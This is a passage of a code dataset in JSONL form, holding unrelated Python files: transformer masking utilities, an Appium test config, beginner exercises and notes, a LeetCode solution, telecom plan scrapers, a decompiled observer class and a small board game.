size, source length, source length]\n\n return source_mask\n\n\ndef create_target_mask(source, target):\n '''\n create masking tensor for decoder's self attention and decoder's attention on the output of encoder\n if sentence is [2, 193, 9, 27, 10003, 1, 1, 1, 3] and 2 denotes , 3 denotes and 1 denotes \n masking tensor will be [False, False, False, False, False, True, True, True, False]\n :param source: [batch size, source length]\n :param target: [batch size, target length]\n :return:\n '''\n target_length = target.shape[1]\n\n subsequent_mask = create_subsequent_mask(target)\n # subsequent_mask = [batch size, target length, target length]\n\n source_mask = (source == pad_idx)\n target_mask = (target == pad_idx)\n # target_mask = [batch size, target length]\n\n # repeat sentence masking tensors 'sentence length' times\n dec_enc_mask = source_mask.unsqueeze(1).repeat(1, target_length, 1)\n target_mask = target_mask.unsqueeze(1).repeat(1, target_length, 1)\n\n # combine token masking tensor and subsequent masking tensor for decoder's self attention\n target_mask = target_mask | subsequent_mask\n # target_mask = [batch size, target length, target length]\n\n return target_mask, dec_enc_mask\n\n\ndef create_non_pad_mask(sentence):\n '''\n create non-pad masking tensor which will be used to extract non-padded tokens from output\n if sentence is [2, 193, 9, 27, 1, 1, 1, 3]\n this function returns [[1], [1], [1], [1], [0], [0], [0], [1]]\n '''\n return sentence.ne(pad_idx).type(torch.float).unsqueeze(-1)\n\n\ndef create_position_vector(sentence):\n # sentence = [batch size, sentence length]\n batch_size, _ = sentence.size()\n pos_vec = np.array([(pos+1) if word != pad_idx else 0\n for row in range(batch_size) for pos, word in enumerate(sentence[row])])\n pos_vec = pos_vec.reshape(batch_size, -1)\n pos_vec = torch.LongTensor(pos_vec).to(device)\n return pos_vec\n\n\ndef create_positional_encoding(max_len, hidden_dim):\n # PE(pos, 2i) = sin(pos/10000 ** (2*i / hidden_dim))\n # PE(pos, 2i + 1) = cos(pos/10000 ** (2*i / hidden_dim))\n sinusoid_table = np.array([pos / np.power(10000, 2 * i / hidden_dim)\n for pos in range(max_len) for i in range(hidden_dim)])\n # sinusoid_table = [max len * hidden dim]\n\n sinusoid_table = sinusoid_table.reshape(max_len, -1)\n # sinusoid_table = [max len, hidden dim]\n\n sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2]) # calculate pe for even dimension\n sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2]) # calculate pe for odd dimension\n\n # convert numpy based sinusoid table to torch.tensor and repeat it 'batch size' times\n sinusoid_table = torch.FloatTensor(sinusoid_table).to(device)\n sinusoid_table[0] = 0.\n\n return sinusoid_table\n","sub_path":"w11_pytorch-transformer-kor-eng/model/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"72605704","text":"# -*- coding:utf-8 -*-\n\"\"\"\ndirver配置\n\"\"\"\n\nimport unittest\nimport warnings\n\nfrom appium import webdriver\n\n\nclass driver_configure(unittest.TestCase):\n @classmethod\n def get_driver(self):\n warnings.simplefilter(\"ignore\", ResourceWarning) # 忽略警告\n try:\n dri = {\n \"platformName\": \"Android\", # 设备平台\n \"deviceName\": \"b43d2c1\", # 设备名称\n \"platformVersion\": \"6.0.1\", # 设备系统版本\n \"appPackage\": \"com.viausd.pay\", # 包名\n \"appActivity\": \"com.viausd.activity.MainActivity\", # 启动项\n # \"app\":\"C:\\\\Users\\\\shuchengxiang\\\\Desktop\\\\shoujibaidu_25580288.apk\",#apk包路径\n \"unicodeKeyboard\": True, # 此两行是为了解决字符输入不正确的问题\n \"resetKeyboard\": True # 运行完成后重置软键盘的状态 \n }\n self.driver = webdriver.Remote('http://localhost:4723/wd/hub', dri) # 启动app\n return self.driver\n except Exception as e:\n raise e\n","sub_path":"control/driver_configure.py","file_name":"driver_configure.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"612217838","text":"materials = input().lower().split()\n\nkey_materials = {'shards': 0, 'fragments': 0, 'motes': 0}\njunk_materials = {}\nflag = False\n\nwhile True:\n for i in range(0, len(materials), 2):\n key = materials[i + 1]\n value = int(materials[i])\n if key in key_materials:\n key_materials[key] += value\n elif key in junk_materials:\n junk_materials[key] += value\n elif key not in key_materials and key in ('shards', 'fragments', 'motes'):\n key_materials[key] = value\n else:\n junk_materials[key] = value\n\n if key in ('shards', 'fragments', 'motes') and key_materials[key] >= 250:\n key_materials[key] -= 250\n if key == 'shards':\n print('Shadowmourne obtained!')\n elif key == 'fragments':\n print('Valanyr obtained!')\n elif key == 'motes':\n print('Dragonwrath obtained!')\n flag = True\n break\n if flag:\n break\n materials = input().lower().split()\n\nkey_materials = dict(sorted(key_materials.items(), key=lambda s: (-s[1], s[0])))\njunk_materials = dict(sorted(junk_materials.items(), key=lambda s: s[0]))\n\nfor key, value in key_materials.items():\n print(f'{key}: {value}')\nfor key, value in junk_materials.items():\n print(f'{key}: {value}')\n","sub_path":"dictionaries/exercise/legendary_farming.py","file_name":"legendary_farming.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"225191487","text":"import pylab\r\nimport matplotlib.pyplot as plt\r\nax = plt.gca()\r\nax.spines['right'].set_color('none')\r\nax.spines['top'].set_color('none')\r\nax.xaxis.set_ticks_position('bottom')\r\nax.spines['bottom'].set_position(('data',0))\r\nax.yaxis.set_ticks_position('left')\r\nax.spines['left'].set_position(('data',0))\r\nx = pylab.arange(-10, 10.5, 0.5) # lista argumentów x\r\na = int(input(\"Podaj współczynnik a: \"))\r\ny1 = [i / -3 + a for i in x if i <= 0]\r\n\r\ny2 = [i**2 / 3 for i in x if i >= 0]\r\n\r\nx1 = [i for i in x if i <= 0]\r\nx2 = [i for i in x if i >= 0]\r\n\r\npylab.plot(x1, y1, x2, y2)\r\npylab.title('Wykres f(x)')\r\npylab.grid(True)\r\npylab.show()\r\nz","sub_path":"zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"91192808","text":"######################ディクショナリ\ncars = {\"name\":\"GT-R 35\",\n \"maker\":\"Nissan\",\n \"engine\":\"3.8L V6\"}\nprint(cars)\nprint(cars[\"name\"]) #辞書型を使うと要素に名前を付けることができる。\n#更新\ncars[\"name\"] = \"LAF\"\ncars[\"maker\"] = \"Lexus\"\ncars[\"engine\"] = \"V10\"\nprint(cars)\n#追加\ncars[\"生産年\"] = \"2010\"\nprint(cars)\n#削除\ndel cars[\"生産年\"]\nprint(cars)\n\n#ディクショナリはキーの存在を確かめながら実行することがおおい。inで検索できる\ndef convert_number(num):\n roman_num = {1:\"I\",2:\"II\",3:\"III\",4:\"IV\",5:\"V\",6:\"VI\",7:\"VII\",8:\"VIIII\",9:\"IX\"}\n\n if num in roman_num:\n return roman_num[num]\n else:\n return \"[変換できません]\"\n\nnumin = int(input(\"ローマ数字に変換します、数字を入力してください\"))\n\nprint(convert_number(numin))\n\nfor key in cars:\n print(key,cars[key])\n\n\n\n\n\n#########################集合 set\ndef detect_number(num):\n prime = {2,3,5,7,13,17} #setを作る\n fib = {1,1,2,3,5,8,13}\n prime_fib = prime & fib #素数かつフィボナッチの集合\n\n if num in prime_fib:\n return str(num) + \"は素数でありフィボナッチ数である\"\n else:\n return str(num) + \"は素数でなく、フィボナッチ数でもない\"\nprint(detect_number(numin))\n\n\n\n\n\n#####################タプル  これはリストの要素更新ができない版\npref_capitals = {(43.06417,141.34684):\"北海道(札幌)\",\n (40.82444,140.74):\"青森県(青森市)\",\n (39.70361,141.1525):\"岩手県(盛岡市)\"\n } #ディクショナリのキーをリストで作る\n\nloc = (40,140)\nfor key in pref_capitals:\n if loc == key:\n print(pref_capitals[key])\n break\n\n\n nearest_cap = \"\"\n nearest_dist = 10000 #最寄りまでの距離\n for key in pref_capitals:\n dist = (loc[0] - key[0])**2 + (loc[1] - key[1])**2\n if nearest_dist > dist: #ループしてるからより近い地点で更新される\n nearest_dist = dist\n nearest_cap = pref_capitals[key]\nprint(nearest_dist, nearest_cap) #最終的に決まったものを出力\n\n################## Fizz Buzz問題\ncount = 1\nwhile count <= 100:\n num = count\n if num % 3 == 0 and num % 5 == 0:\n print(\"FizzBuzz\")\n if num % 3== 0:\n print(\"Fizz\")\n if num % 5 == 0:\n print(\"Buzz\")\n else:\n print(num)\n count += 1\n\n########### FizzBuzzを解く関数\ndef fizzbuzz(count=100, fizzmod=3, buzzmod=5):\n for ii in range(1,count+1):\n if ii%fizzmod ==0 and ii%buzzmod ==0:\n print(\"fizzbuzz\")\n if ii%fizzmod ==0:\n print(\"fizz\")\n if ii%buzzmod ==0:\n print(\"buzz\")\n else:\n print(ii)\nprint(fizzbuzz())\n\nlocal_var =1\ndef test_func(an_arg):\n print(\"globalなし\")\n local_var = an_arg\n print(\"関数の中\"+str(local_var))\ntest_func(200)\nprint(\"関数の外\"+str(local_var))\n\nlocal_var =1\ndef test_func(an_arg):\n print(\"glabalあり\")\n global local_var #glabalつけるとスコープが広がる\n local_var = an_arg\n print(\"関数の中\"+str(local_var))\ntest_func(200)\nprint(\"関数の外\"+str(local_var))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#end\n","sub_path":"chapter3/pythonBaceSkill.py","file_name":"pythonBaceSkill.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"240852469","text":"'''\n【Python3代码不变,故此Python2代码可做参考】\nLeetCode681. Next Closest Time\nGiven a time represented in the format \"HH:MM\", form the next closest time by reusing the current digits. There is no limit on how many times a digit can be reused.\n\nYou may assume the given input string is always valid. For example, \"01:34\", \"12:09\" are all valid. \"1:34\", \"12:9\" are all invalid.\n\nExample 1:\n\nInput: \"19:34\"\nOutput: \"19:39\"\nExplanation: The next closest time choosing from digits 1, 9, 3, 4, is 19:39, which occurs 5 minutes later. It is not 19:33, because this occurs 23 hours and 59 minutes later.\nExample 2:\n\nInput: \"23:59\"\nOutput: \"22:22\"\nExplanation: The next closest time choosing from digits 2, 3, 5, 9, is 22:22. It may be assumed that the returned time is next day's time since it is smaller than the input time numerically.\n'''\nclass Solution(object):\n def getIndex(self, i, array):\n index = 0\n for j in range(len(array)):\n if array[j] == i:\n index = j\n return index\n\n def nextClosestTime(self, time):\n \"\"\"\n :type time: str\n :rtype: str\n \"\"\"\n numbers = []\n for i in time:\n if i != ':':\n numbers.append(int(i))\n numbers.sort()\n lt = list(time)\n temp1 = self.getIndex(int(lt[-1]), numbers)\n if temp1 != 3:\n lt[-1] = str(numbers[temp1 + 1])\n return \"\".join(lt)\n else:\n lt[-1] = str(numbers[0])\n temp2 = self.getIndex(int(lt[-2]), numbers)\n if temp2 != 3 and numbers[temp2 + 1] < 6:\n lt[-2] = str(numbers[temp2 + 1])\n return \"\".join(lt)\n else:\n lt[-2] = str(numbers[0])\n temp3 = self.getIndex(int(lt[1]), numbers)\n if temp3 != 3:\n if int(lt[0]) != 2 or numbers[temp3 + 1] < 5:\n lt[1] = str(numbers[temp3 + 1])\n return \"\".join(lt)\n lt[1] = str(numbers[0])\n if numbers[0] < numbers[1] and numbers[1] < 3:\n lt[0] = str(numbers[1])\n return \"\".join(lt)\n","sub_path":"LeetCode-Python2/2017.9/LeetCode681-Next Closest Time.py","file_name":"LeetCode681-Next Closest Time.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"467273712","text":"#!/usr/bin/env python\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nfrom prodServer import request, seleniumRequest\nfrom bs4 import BeautifulSoup\nimport re\n\n\ndef rogersHomePhone(row):\n htmlText = request(row['url'])\n regex_name = '

(.+?)

'\n pattern_name = re.compile(regex_name, re.MULTILINE)\n name_list = re.findall(pattern_name, htmlText)\n regex_price = '.[\\n\\t\\s]+(.+?)'\n pattern_price = re.compile(regex_price, re.MULTILINE)\n price_list = re.findall(pattern_price, htmlText)\n regex_long_dist = '(.+?)'\n pattern_long_dist = re.compile(regex_long_dist)\n long_dist_list = re.findall(pattern_long_dist, htmlText)\n plan_list = []\n for i in range(len(name_list)):\n if len(long_dist_list) == 0:\n temp = {\n 'name': name_list[i],\n 'price': price_list[i] + '.99',\n 'feature': 'local calls only',\n 'province': row['province'],\n 'company': row['company'],\n 'priceBeforePromo': ''\n }\n else:\n temp = {\n 'name': name_list[i],\n 'price': price_list[i] + '.99',\n 'feature': long_dist_list[i],\n 'province': row['province'],\n 'company': row['company'],\n 'priceBeforePromo': ''\n }\n plan_list.append(temp)\n return plan_list\n\n\ndef rogersInternet(row):\n htmlText = seleniumRequest(row['url'])\n htmlText.replace(u'\\n
')\n soup = BeautifulSoup(htmlText)\n nameList = map(lambda x: x.getText().lower(), soup.find_all('h3', class_='ute-tile-header'))\n dollarList = map(lambda x: x.find('span', class_='price-dollars').getText().lower(),\n soup.find_all('div', class_='ute-tile-footer-price'))\n centList = map(lambda x: x.find('span', class_='price-cents').getText().lower(),\n soup.find_all('div', class_='ute-tile-footer-price'))\n priceList = map(lambda x: x[0] + x[1], zip(dollarList, centList))\n usageList = map(lambda x: x.div.p.getText().lower().replace('usage', '').strip(),\n soup.find_all('div', class_='detail-content'))\n downloadList = map(lambda x: x.find_all('div')[0].getText().lower().split('download')[0].strip(),\n soup.find_all('div', class_='speeds-container'))\n uploadList = map(lambda x: x.find_all('div')[1].getText().lower().split('upload')[0].strip(),\n soup.find_all('div', class_='speeds-container'))\n plan_list = []\n for i in range(len(nameList)):\n temp = {\n 'name': nameList[i],\n 'price': priceList[i],\n 'limit': usageList[i],\n 'download': downloadList[i],\n 'upload': uploadList[i],\n 'province': row['province'],\n 'company': row['company'],\n 'priceBeforePromo': '',\n 'duration': ''\n }\n plan_list.append(temp)\n return plan_list\n\n\ndef rogersTv(row):\n htmlText = seleniumRequest(row['url'])\n soup = BeautifulSoup(htmlText)\n package_names_soup = soup.find_all('div', 'Package-title ng-binding')\n package_names = []\n for package_ in package_names_soup[:-1]:\n package_names.append(package_.string.strip().encode('ascii', 'ignore'))\n package_names.append(package_names_soup[-1].string.strip().encode('ascii', 'ignore'))\n num_channels = map(lambda x: x.span.string, soup.find_all('div', class_='Package-description'))\n del num_channels[-1]\n dollar = map(lambda x: x.string, soup.find_all('span', class_='ChannelPrice-amount'))\n num_channels.append(dollar[-1])\n cent = map(lambda x: x.getText().replace('/mo', '').replace('1', '').strip(),\n soup.find_all('span', class_='ChannelPrice-details'))\n prices = map(lambda x: x[0] + x[1], zip(dollar, cent))\n del prices[-1]\n map(lambda x: x.span['style'].split('/')[-1].split('.')[0], soup.find_all('div', class_='PackageChannelImage'))\n h = soup.find_all('div', class_='Package-channels')\n features = []\n bonus = []\n for chan_ in h:\n channel_ = map(lambda x: x.span['style'].split('/')[-1].split('.')[0],\n chan_.find_all('div', class_='PackageChannelImage'))\n if 'ng-scope' in chan_['class']:\n features.append(channel_)\n elif 'Package-channels--featured' in chan_['class']:\n bonus.append(channel_)\n else:\n features.append(channel_)\n bonus.append([''])\n result_record = []\n num_packages = len(package_names)\n for ind_ in range(num_packages):\n temp = {\n 'name': package_names[ind_],\n 'price': prices[ind_],\n 'numberOfChannels': num_channels[ind_].lower().replace('channels', '').strip(),\n 'features': ','.join([','.join(map(lambda x: str(x), features[ind_])),\n ','.join(map(lambda x: str(x), bonus[ind_]))]),\n 'province': row['province'],\n 'company': row['company'] ,\n 'priceBeforePromo': ''\n }\n result_record.append(temp)\n return result_record\n\n\ndef rogersBundleOn(htmlText):\n soup = BeautifulSoup(htmlText)\n name_soup = soup.find('div', class_='row bundles-heading')\n names = map(lambda x: x.h3.string, name_soup.find_all('div', class_='col-md-3'))\n hps = map(lambda x: x.getText(), soup.find_all('div', class_='home-phone-calling-package'))\n price_soup = soup.find('div', class_='bundle-pricing-wrapper')\n dollar = map(lambda x: x.getText(), price_soup.find_all('span', class_='price-dollars'))\n cent = map(lambda x: x.getText().replace(\"*\", '').strip(), price_soup.find_all('span', class_='price-cents'))\n priceAll = map(lambda x: x[0] + x[1], zip(dollar, cent))\n price = [priceAll[i] for i in range(len(priceAll)) if i%2==0]\n save = [priceAll[i] for i in range(len(priceAll)) if i%2==1]\n term = map(lambda x:filter(lambda z: z.isdigit(), x.split(' ')), map(lambda x: x.getText(), soup.find_all('p', class_='price-details')))\n free_extra_soup = soup.find('div', 'row bundle-free-extras-wrapper')\n# free_extra = map(lambda z: map(lambda x: x['alt'], z.find_all('img')),\n# free_extra_soup.find_all('div', class_='bundle-free-extras-info'))\n tv_soup = soup.find('div', class_='bundle-tv-wrapper')\n numChannels = map(lambda x: x.getText(), tv_soup.find_all('span', class_='channelsAmount'))\n tv_name = map(lambda x: x.getText(), tv_soup.find_all('h3', class_=\"ute-tile-header\"))\n# tv_description = map(lambda x: x.getText(), tv_soup.find_all('span', class_='featuringText'))\n# tv_channels = map(lambda z: map(lambda x: x['alt'], z.find_all('img')), tv_soup.find_all('ul', class_='clearfix'))\n# tv_detail_soup = soup.find_all('div', class_='channel-featuring-inner-wrapper')\n# tv_detail_channels = map(lambda z: map(lambda x: map(lambda y: y['alt'], x.find_all('img')),\n# z.find_all('ul', class_='clearfix')), tv_detail_soup)\n# tv_detail_desc = filter(lambda a: a != '',\n# map(lambda x: x.getText().strip(),\n# soup.find_all('div', class_='col-md-8 tv-pkg-details-wrapper')))\n int_soup = soup.find('div', class_='bundle-internet-wrapper')\n int_plan = map(lambda x: x.getText(), int_soup.find_all('h3', class_='ute-tile-header'))\n int_bandwith = map(lambda x: x.getText(), int_soup.find_all('div', class_='internet-expander-usage'))\n int_speed = map(lambda x: x.getText().strip().replace('\\n', ' '),\n int_soup.find_all('div', class_='internet-expander-speed-block'))\n download = map(lambda z: z.split('for')[0].strip(), filter(lambda x: 'download' in x.lower(), int_speed))\n upload = map(lambda z: z.split('for')[0].strip(), filter(lambda x: 'upload' in x.lower(), int_speed))\n num_bundle = len(names) * 2\n #int_detail_desc = map(lambda x: x.getText().replace('\\n', ' '),\n # soup.find_all('div', class_='internet-expander-details'))\n #additional_cost = map(lambda x: x.getText().replace('\\n', ' '),\n # soup.find_all('div', class_='bundle-additionalcost-info-inner-wrapper'))\n bundles = []\n #include = map(lambda x: ','.join(map(lambda z: z['alt'], x.find_all('img'))),\n # soup.find_all('div', class_='bundle-free-extras-info-inner-wrapper'))\n hp_processed = [('no hp' if i % 2 else hps[i / 2]) for i in range(8)]\n productMix = [('TV + Internet' if i % 2 else 'TV + Internet + Home phone') for i in range(8)]\n for i in range(num_bundle):\n temp = {\n 'hp': hp_processed[i],\n 'productMix': productMix[i],\n #'include': include[i / 2],\n 'price': price[i],\n 'term': term[i],\n #'free_extra': ','.join(free_extra[i / 2]),\n #'numberOfChannels': numChannels[i].lower().replace('channels', '').strip(),\n #'featuredChannels': ','.join([one for sublist in tv_detail_channels[i / 2] for one in sublist]),\n 'internet': int_plan[i / 2],\n 'name': names[i / 2].lower(),\n 'limit': int_bandwith[i / 2],\n 'tv': tv_name[i/2],\n 'upload': upload[i / 2],\n 'download': download[i/2],\n #'additionalCost': additional_cost[i].replace('How to get it', ''),\n 'priceBeforePromo': str(float(price[i]) + float(save[i])),\n 'mobile': ''\n }\n bundles.append(temp)\n return bundles\n\n\ndef rogersBundle(row):\n htmlText = seleniumRequest(row['url'])\n if row['province'].lower() == 'on':\n bundles = rogersBundleOn(htmlText)\n else:\n bundles = rogersBundleOther(htmlText)\n for bundle in bundles:\n bundle['province'] = row['province']\n bundle['company'] = row['company']\n bundle['duration'] = ''\n return bundles\n\n\ndef rogersBundleOther(htmlText):\n soup = BeautifulSoup(htmlText)\n internet = map(lambda x: x.find('div', class_='plan-content').find('span', class_='leading').getText(),\n soup.find_all('div', class_='rogers-ignite'))\n internetUsage = map(lambda x: x.find('div', class_='plan-content').find('span', class_='highlight').getText(),\n soup.find_all('div', class_='rogers-ignite'))\n speed = map(lambda x: map(lambda z: z.getText(), x.find('div', class_='plan-content').\n find('div', class_='speeds-container').find_all('span', class_='highlight')),\n soup.find_all('div', class_='rogers-ignite'))\n uploadSpeed = [x[1] for x in speed]\n numBundle = len(internet)\n downloadSpeed = [x[0] for x in speed]\n tv = map(lambda x: x.find('div', class_='plan-content').find('span', class_='leading').getText(),\n soup.find_all('div', class_='new-tv-pack-wrapper'))\n #numChannel = map(lambda x: x.find('div', class_='plan-content').find('div', class_='speeds-container').\n # find('span', class_='inlineText highlight').getText(),\n # soup.find_all('div', class_='new-tv-pack-wrapper'))\n #featuredChannels = map(lambda x: map(lambda z: z['title'], x.find_all('img')),\n # soup.find_all('div', class_='channel-featuring-inner-wrapper'))\n homePhone = map(lambda x: x.li.findNext('li').getText()[:-1], soup.find_all('ul', class_='list-unstyled'))\n #includes = map(lambda x: map(lambda z: z.getText(), x.find_all('a')), soup.find_all('ul', class_='include-details'))\n priceDollar = map(lambda x: x.find('span', class_='price-dollars').getText(),\n soup.find_all('ul', class_='details-bundles-pricing'))\n priceCent = map(lambda x: x.find('span', class_='price-cents').getText().split('/')[0],\n soup.find_all('ul', class_='details-bundles-pricing'))\n price = map(lambda x: '.'.join(x), zip(priceDollar, priceCent))\n saveDollar = map(lambda x: x.find('span', class_='price-dollars').getText(),\n soup.find_all('div', class_='discount-promo-bubble'))\n saveCent = map(lambda x: x.find('sup', class_='price-cents').getText().split('/')[0],\n soup.find_all('div', class_='discount-promo-bubble'))\n save = map(lambda x: ''.join(x), zip(saveDollar, saveCent))\n terms = map(lambda x: x.find('span', class_='price-period').getText().split('/')[0],\n soup.find_all('ul', class_='details-bundles-pricing'))\n additionalCost = map(lambda x: ','.join(map(lambda z: z.getText(), x.find_all('p'))),\n soup.find_all('div', class_='one-time-fee'))\n productMix = ['TV + Internet + Home phone' for i in range(8)]\n bundles = []\n for i in range(numBundle):\n temp = {\n 'hp': homePhone[i],\n #'include': ','.join(includes[i]),\n 'productMix': productMix[i],\n 'price': price[i].replace('$', ''),\n 'term': terms[i],\n # 'free_extra': '',\n #'featuredChannels': ','.join(featuredChannels[i]),\n #'numberOfChannels': '',\n 'tv': tv[i],\n 'internet': internet[i],\n 'name': 'bundle {0}'.format(i+1),\n 'limit': internetUsage[i],\n 'upload': uploadSpeed[i],\n 'download': downloadSpeed[i],\n 'additionalCost': additionalCost[i],\n 'priceBeforePromo': str(float(price[i].replace('$', '')) + float(save[i])),\n 'mobile': ''\n }\n bundles.append(temp)\n return bundles\n\n","sub_path":"residencePlan/residencePlanFunctions/rogersFunctions.py","file_name":"rogersFunctions.py","file_ext":"py","file_size_in_byte":12805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"478226394","text":"import fitFieldMap_v2 as fit\n\ndef main():\n field1 = 'Joes_output/cold_SSU.dat'\n field2 = 'Joes_output/warm_SSU.dat'\n run01 = 'Data/Data/Run01/Analysis/run1_polarCoordinates_forwardOnly.dat'\n\n fit.fitFieldMap(run01, field1, field2)\n\nif __name__==\"__main__\":\n main()\n","sub_path":"FitMapTest.py","file_name":"FitMapTest.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"394548855","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python3.6/dist-packages/mvc/observers/list_item_observer.py\n# Compiled at: 2020-03-07 03:51:49\n# Size of source mod 2**32: 2702 bytes\nimport weakref\nfrom .base import Observer\n\nclass ListItemObserver(Observer):\n __doc__ = \"\\n An observer that observes a single item in a list and informs us of changes.\\n The observed properties are defined in the list type's meta class by\\n setting their property descriptors 'tabular' attribute to True.\\n \"\n _previous_model_ref = None\n\n @property\n def _previous_model(self):\n if self._previous_model_ref is not None:\n return self._previous_model_ref()\n else:\n return\n\n @_previous_model.setter\n def _previous_model(self, value):\n self._previous_model_ref = weakref.ref(value, self.clear)\n\n def __init__(self, on_changed, model=None, spurious=False):\n super(ListItemObserver, self).__init__(spurious=spurious)\n self.on_changed = on_changed\n self.observe_model(model)\n\n def observe_model(self, model):\n if self._previous_model is not None:\n self.relieve_model(self._previous_model)\n if model is not None:\n for prop_name, data_type in model.Meta.get_column_properties():\n self.observe((self.on_prop_mutation), prop_name, assign=True)\n\n self._previous_model = model\n super(ListItemObserver, self).observe_model(model)\n\n def clear(self, *args):\n self.on_changed = None\n if len(args) == 0:\n self.observe_model(None)\n\n def on_prop_mutation(self, model, prop_name, info):\n if callable(self.on_changed):\n self.on_changed(model)","sub_path":"pycfiles/PyXRD-0.8.4.linux-x86_64.tar/list_item_observer.cpython-36.py","file_name":"list_item_observer.cpython-36.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"625365658","text":"from random import randint, seed\nfrom copy import deepcopy\n\nseed(a=0)\nclass Operand:\n def __init__(self, name, is_reg=False, is_imm=False, is_dummy=False, val=None, bits: int = 64):\n self.name = name\n self.is_reg = is_reg\n self.is_imm = is_imm\n self.is_dummy = is_dummy\n self.bits = bits\n self.val = val\n \nclass OperandDict:\n def __init__(self) -> None:\n self.all: dict[str, Operand] = {}\n self.randomize()\n\n def randomize(self) -> None:\n for op in self.all.values():\n op.val = op.val if op.is_imm else randint(-31, 31)\n \n def copy(self):\n return deepcopy(self)\n \n def same_as(self, op_dict) -> bool:\n for key in self.all:\n if key not in op_dict.all:\n continue\n if self.all[key].val != op_dict.all[key].val:\n return False\n return True\n \n def add(self, op: Operand) -> None:\n if op.name not in self.all:\n self.all[op.name] = op\n \n def ignore_dummies(self):\n \"\"\"難読化によって自動生成された変数を除いたOperandDictを返す.\n \"\"\"\n res = OperandDict()\n for op in self.all.values():\n if op.is_dummy:\n continue\n res.add(op)\n return res\n \n def ignore_imm(self):\n \"\"\"即値を除いたOperandDictを返す.\n \"\"\"\n res = OperandDict()\n for op in self.all.values():\n if op.is_imm:\n continue\n res.add(op)\n return res\n \n def get_values(self):\n return [op.val for op in self.all.values()]\n\n @staticmethod\n def extend(op1, op2) -> None:\n for key in op1.all:\n if key in op2.all:\n op1.all[key].val = op2.all[key].val\n","sub_path":"libs/GAS/operand.py","file_name":"operand.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"125771187","text":"import time\r\nfrom math import *\r\n\r\nimport colour as col\r\nimport game_circle\r\n\r\n\r\nclass Board(object):\r\n '''\r\n Class to create and play on a single game\r\n '''\r\n pattern = [1,2,3,4,5,6] #Number of circles on each line\r\n player1_col = col.RED #Colour for player 1\r\n player2_col = col.BLUE #Colour for player 2\r\n moves = [(i//2 + 1) for i in range(sum(pattern) - 1)] #Determines which number to place on game board\r\n points_lost_p1 = 0 #For final point counting\r\n points_lost_p2 = 0 #For final point counting\r\n end_flag = 0 #Determines end of game, and other animation-based ideas\r\n \r\n def __init__(self, screen):\r\n '''\r\n Constructor\r\n Only grid and player_turn are instance variables\r\n '''\r\n self.grid = [] #List of game circles\r\n self.initialize_grid(screen)\r\n self.player_turn = 0 #Determines player's turns\r\n \r\n\r\n def initialize_grid(self, screen):\r\n '''\r\n Determines centres and radii as per screen size\r\n and generates the grid of game-circles as per requirement.\r\n '''\r\n centres = Board.get_centres(screen)\r\n radius = Board.get_radius(centres)\r\n for i in range(len(centres)):\r\n #Create the game circle, add it to the list\r\n ob = game_circle.game_circle(radius, centres[i])\r\n self.grid.append(ob)\r\n\r\n def draw_board(self, screen):\r\n '''\r\n Draws circles onto screen, and accounts for the endgame.\r\n ''' \r\n for circle in self.grid: #Draw circles\r\n circle.draw_circle(screen)\r\n if self.player_turn == len(Board.moves) and Board.end_flag==1: #Black out circles adjacent to black hole\r\n Board.delay_loop(1)\r\n self.adjacent_to_black_hole()\r\n Board.end_flag = -1\r\n elif self.player_turn == len(Board.moves) and Board.end_flag == 0: #Endgame flag\r\n Board.end_flag = 1\r\n\r\n def update_board(self, mpos):\r\n '''\r\n Updates the state of the board based on a mouse click.\r\n '''\r\n colour = None #Default initialization\r\n if self.player_turn >= len(Board.moves): #If endgame, don't register the click\r\n return None\r\n for circle in self.grid:\r\n #If a circle is clicked and it has not been clicked before, update the colour and value of that circle\r\n if circle.is_clicked(mpos) and circle.colour == game_circle.game_circle.def_col:\r\n #Determine which player's turn it is\r\n if self.player_turn %2==1:\r\n colour = Board.player2_col\r\n elif self.player_turn%2==0:\r\n colour = Board.player1_col\r\n value = Board.moves[self.player_turn]\r\n circle.update_circle(colour, value)\r\n self.player_turn +=1\r\n break\r\n\r\n @staticmethod\r\n def draw_static(board_dict):\r\n pass\r\n\r\n @staticmethod\r\n def delay_loop(t):\r\n '''\r\n Gives a delay loop of exactly t seconds\r\n '''\r\n st = time.time()\r\n while time.time()-st lpf:\n if x % lpf == 0:\n x = x / lpf\n lpf = 2\n else:\n lpf += 1;\n print(\"Largest Prime Factor: %d\" % lpf);\n\n\ndef main():\n x = int(input(\"Input long int:\"))\n lpf(x);\n return 0;\n\n\nif __name__ == '__main__':\n 